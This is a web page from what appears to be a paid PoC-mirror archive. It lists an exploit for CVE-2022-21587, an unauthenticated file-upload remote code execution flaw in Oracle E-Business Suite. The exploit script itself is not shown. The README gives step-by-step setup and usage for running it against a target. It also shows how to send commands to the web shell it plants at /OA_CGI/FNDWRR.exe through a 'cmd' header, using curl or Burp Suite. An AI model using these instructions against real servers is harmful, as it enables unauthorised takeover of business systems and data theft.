Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-21587 PoC — Oracle E-Business Suite 访问控制错误漏洞

Source
Associated Vulnerability
Title:Oracle E-Business Suite 访问控制错误漏洞 (CVE-2022-21587)
Description:Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Description
This script is used for automating exploit for Oracle Ebussiness (EBS) for CVE 2022-21587 ( Unauthenticated File Upload For Remote Code Execution)
Readme
Prerequirement for this exploit to run:

- python3 including module (requests, os, sys, slipit)
- uuencode



Before you run, make sure to use for only on ethical duties


if the exploit Fail to run:
- Make sure you already install the pre req module

install requests
- pip3 install requests


- Install slipit, git clone https://github.com/usdAG/slipit
  - cd slipit
  - python3 setup.py sdist
  - pip3 install --user dist/* OR python3 -m pip install --user dist/*
  
- Install uuencode
  - sudo apt install sharutils
  
 

- Usage : python3 exploit.py http://target.com
  - then the shell will poping up OR you can also execute the shell using curl or web proxies tools(burpsuite)
  - using curl : curl -k https://target/OA_CGI/FNDWRR.exe -H 'cmd: whoami'
  - using burpsuite: Just adding `cmd` in header request with any bash payload you want execute
File Snapshot

[4.0K] /data/pocs/74afd4e209a50f9aa357d2b7bff7ff6c9bb5f5c2 ├── [1.7K] exploit.py └── [ 855] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →